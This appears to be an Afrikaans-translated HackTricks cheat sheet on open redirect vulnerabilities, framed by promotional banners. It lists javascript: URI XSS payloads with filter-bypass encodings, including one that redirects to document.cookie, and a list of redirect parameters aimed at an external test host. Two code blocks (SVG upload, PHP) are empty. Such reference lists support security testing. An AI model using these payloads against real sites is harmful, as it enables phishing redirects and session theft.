# Oopverwysing
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
## Oopverwysing ### Verwys na localhost of willekeurige domeine {% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} [url-format-bypass.md](ssrf-server-side-request-forgery/url-format-bypass.md) {% endcontent-ref %} ### Oopverwysing na XSS ```bash #Basic payload, javascript code is executed after "javascript:" javascript:alert(1) #Bypass "javascript" word filter with CRLF java%0d%0ascript%0d%0a:alert(0) # Abuse bad subdomain filter javascript://sub.domain.com/%0Aalert(1) #Javascript with "://" (Notice that in JS "//" is a line coment, so new line is created before the payload). URL double encoding is needed #This bypasses FILTER_VALIDATE_URL os PHP javascript://%250Aalert(1) #Variation of "javascript://" bypass when a query is also needed (using comments or ternary operator) javascript://%250Aalert(1)//?1 javascript://%250A1?alert(1):0 #Others %09Jav%09ascript:alert(document.domain) javascript://%250Alert(document.location=document.cookie) /%09/javascript:alert(1); /%09/javascript:alert(1) //%5cjavascript:alert(1); //%5cjavascript:alert(1) /%5cjavascript:alert(1); /%5cjavascript:alert(1) javascript://%0aalert(1) <>javascript:alert(1); //javascript:alert(1); //javascript:alert(1) /javascript:alert(1); /javascript:alert(1) \j\av\a\s\cr\i\pt\:\a\l\ert\(1\) javascript:alert(1); javascript:alert(1) javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie) javascript:confirm(1) javascript://https://whitelisted.com/?z=%0Aalert(1) javascript:prompt(1) jaVAscript://whitelisted.com//%0d%0aalert(1);// javascript://whitelisted.com?%a0alert%281%29 /x:1/:///%01javascript:alert(document.cookie)/ ";alert(0);// ``` ## Oop Herlei laai svg-lêers op ```markup ``` ## Gewone inspuitingsparameters ``` /{payload} ?next={payload} ?url={payload} ?target={payload} ?rurl={payload} ?dest={payload} ?destination={payload} ?redir={payload} ?redirect_uri={payload} ?redirect_url={payload} ?redirect={payload} /redirect/{payload} /cgi-bin/redirect.cgi?{payload} /out/{payload} /out?{payload} ?view={payload} /login?to={payload} ?image_url={payload} ?go={payload} ?return={payload} ?returnTo={payload} ?return_to={payload} ?checkout_url={payload} ?continue={payload} ?return_path={payload} success=https://c1h2e1.github.io data=https://c1h2e1.github.io qurl=https://c1h2e1.github.io login=https://c1h2e1.github.io logout=https://c1h2e1.github.io ext=https://c1h2e1.github.io clickurl=https://c1h2e1.github.io goto=https://c1h2e1.github.io rit_url=https://c1h2e1.github.io forward_url=https://c1h2e1.github.io @https://c1h2e1.github.io forward=https://c1h2e1.github.io pic=https://c1h2e1.github.io callback_url=https://c1h2e1.github.io jump=https://c1h2e1.github.io jump_url=https://c1h2e1.github.io click?u=https://c1h2e1.github.io originUrl=https://c1h2e1.github.io origin=https://c1h2e1.github.io Url=https://c1h2e1.github.io desturl=https://c1h2e1.github.io u=https://c1h2e1.github.io page=https://c1h2e1.github.io u1=https://c1h2e1.github.io action=https://c1h2e1.github.io action_url=https://c1h2e1.github.io Redirect=https://c1h2e1.github.io sp_url=https://c1h2e1.github.io service=https://c1h2e1.github.io recurl=https://c1h2e1.github.io j?url=https://c1h2e1.github.io url=//https://c1h2e1.github.io uri=https://c1h2e1.github.io u=https://c1h2e1.github.io allinurl:https://c1h2e1.github.io q=https://c1h2e1.github.io link=https://c1h2e1.github.io src=https://c1h2e1.github.io tc?src=https://c1h2e1.github.io linkAddress=https://c1h2e1.github.io location=https://c1h2e1.github.io burl=https://c1h2e1.github.io request=https://c1h2e1.github.io backurl=https://c1h2e1.github.io RedirectUrl=https://c1h2e1.github.io Redirect=https://c1h2e1.github.io ReturnUrl=https://c1h2e1.github.io ``` ## Kodevoorbeelde #### .Net ```bash response.redirect("~/mysafe-subdomain/login.aspx") ``` #### Java ```bash response.redirect("http://mysafedomain.com"); ``` #### PHP ```php ``` ## Gereedskap * [https://github.com/0xNanda/Oralyzer](https://github.com/0xNanda/Oralyzer) ## Hulpbronne * In [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open%20Redirect) kan jy fuzzing-lyste vind.\\ * [https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html)\\ * [https://github.com/cujanovic/Open-Redirect-Payloads](https://github.com/cujanovic/Open-Redirect-Payloads) * [https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a](https://infosecwriteups.com/open-redirects-bypassing-csrf-validations-simplified-4215dc4f180a)
Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! Ander maniere om HackTricks te ondersteun: * As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)! * Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) * Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) * **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.